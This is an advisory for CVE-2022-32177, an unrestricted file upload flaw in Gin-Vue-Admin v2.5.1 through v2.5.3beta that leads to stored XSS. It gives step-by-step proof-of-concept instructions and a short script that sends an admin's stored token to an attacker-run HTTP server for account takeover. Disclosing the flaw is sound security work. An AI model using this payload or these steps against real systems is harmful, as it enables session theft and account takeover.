CVE-2022-32177

Overview

In "Gin-Vue-Admin", versions v2.5.1 through v2.5.3beta are vulnerable to Unrestricted File Upload that leads to execution of javascript code, through the 'Normal Upload' functionality to the Media Library. When an admin user views the uploaded file, a low privilege attacker will get access to the admin’s cookie leading to account takeover

Details

The "Gin-Vue-Admin" application is affected by "Unrestricted File Upload" vulnerability, where a low privilege user can upload a HTML that contains a malicious Javascript code to the Media Library, and when a victim views the file, the attacker will have access to the victim's cookie and his account.

PoC Details

1. Access the application from a web browser and log in as an admin user.
2. Open a private window and log in as a regular (Low privileges) user.
3. Go to the personal information, click on the profile image, and then click on the 'Normal Upload' button.
4. Create a .png file with the code in the PoC code section below.
5. Create a HTTP server using python (python3 -m http.server 3333)
6. Select the takeover.png and intercept the request.
7. Change the name of takeover.png to takeover.html and forward the request.
8. Go to the Media Library (Upload and Download) from the admin account and open the takeover.html ('Open image in New Tab'). This will trigger the XSS payload from takeover.html and send the admin cookie to the attacker’s server, leading to account takeover.

PoC Code

takeover.png file:

<script>
var i=new Image;
i.src="http://127.0.0.1:3333/?"+localStorage.getItem('token');
</script>

Affected Environments

Gin-Vue-Admin versions v2.5.1 through v2.5.3beta

Prevention

No Fix